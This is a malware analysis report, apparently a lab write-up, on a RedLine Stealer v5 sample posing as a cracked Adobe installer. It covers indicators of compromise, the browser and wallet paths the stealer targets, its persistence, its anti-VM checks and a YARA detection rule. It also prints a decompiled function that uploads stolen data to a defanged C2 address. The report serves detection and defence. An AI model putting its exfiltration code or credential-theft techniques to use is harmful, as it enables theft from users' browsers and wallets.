185.220.101[.]47:80hxxp://185.220.101[.]47/gate.phpRDL_MUTEX_5Xk2pQupdate-service[.]proExecutive Summary
RedLine Stealer v5 is a commodity credential-harvesting malware distributed through malvertising campaigns promoting fake software installers (notably cracked games and productivity tools). Upon execution, it extracts browser-saved passwords, cookies, cryptocurrency wallets, and Discord tokens before exfiltrating them to a C2 panel. This sample was built using the leaked RedLine builder and sold as MaaS (Malware-as-a-Service).
Sample Information
| Field | Value |
|---|---|
| File Name | AdobeInstaller_crack.exe |
| File Type | PE32 executable (GUI) |
| Size | 612 KB |
| Compiler | .NET 4.8 |
| Packer | ConfuserEx (obfuscation) |
| First Seen | 2025-03-10 (VirusTotal) |
| VT Score | 47 / 72 |
Static Analysis
DIE (Detect-It-Easy) identified the sample as a .NET assembly with ConfuserEx obfuscation applied. PE-bear showed no obvious packing but the import table was minimal and consistent with .NET managed code.
Running strings revealed several interesting artifacts after de-obfuscating with de4dot:
gate.php
RDL_MUTEX_5Xk2pQ
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_VideoController
\Google\Chrome\User Data\Default\Login Data
\Mozilla\Firefox\Profiles\
wallet.dat
The C2 URL was stored XOR-encoded with key 0x4A and decoded at runtime.
Dynamic Analysis
Executed inside a Windows 10 VM with FakeNet-NG intercepting traffic and Procmon logging all activity.
Filesystem Activity
- Copied itself to
%APPDATA%\WindowsServices\svchost32.exe - Queried and staged browser databases to
%TEMP%\RDL_tmp\ - Deleted temp folder after successful exfiltration
Registry Activity
- Created persistence key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run→svchost32
Network Activity
After a 3-second sleep (likely sandbox evasion), the sample sent an HTTP POST to 185.220.101[.]47/gate.php with a zipped payload containing:
passwords.txt— browser credentialscookies.json— session cookiessystem_info.txt— hostname, GPU, installed AVwallets/— any.datfiles found
Traffic was unencrypted HTTP, making it easy to inspect with Wireshark.
Code Analysis
After de-obfuscating with de4dot, the main stealer logic was clear. Key functions:
Browser credential extraction — uses SQLite to directly query Login Data from Chromium-based browsers. Passwords are decrypted using CryptUnprotectData (DPAPI).
Crypto wallet scan — enumerates %APPDATA% for known wallet paths (Exodus, Electrum, MetaMask extension storage).
Anti-analysis checks — checks GetTickCount() delta and presence of common VM artifacts (VBOX registry keys, vmtoolsd.exe process).
// Decompiled: C2 communication
private static void SendReport(string zipPath) {
var client = new WebClient();
client.Headers.Add("User-Agent", "Mozilla/5.0");
client.UploadFile("http://185.220.101[.]47/gate.php", zipPath);
}
YARA Rule
rule RedLine_v5_ConfuserEx {
meta:
description = "Detects RedLine Stealer v5 with ConfuserEx obfuscation"
author = "analyst.lab"
date = "2025-03-18"
severity = "critical"
strings:
$mutex = "RDL_MUTEX_" ascii wide
$gate = "gate.php" ascii wide
$tmp_dir = "RDL_tmp" ascii wide
$confuse = { 72 2A 00 00 70 } // ConfuserEx runtime marker
condition:
uint16(0) == 0x5A4D and
2 of ($mutex, $gate, $tmp_dir) and
$confuse
}
Conclusion
This RedLine v5 sample is a textbook commodity stealer — cheap to deploy, effective against average users, and trivial for defenders to detect once signatures exist. The ConfuserEx obfuscation is superficial and de4dot removes it completely. The unencrypted C2 channel is an operational security failure that makes traffic detection straightforward with a simple Snort rule.
The use of fake Adobe installers as a delivery vector points to a low-sophistication threat actor targeting home users, gamers, and piracy communities.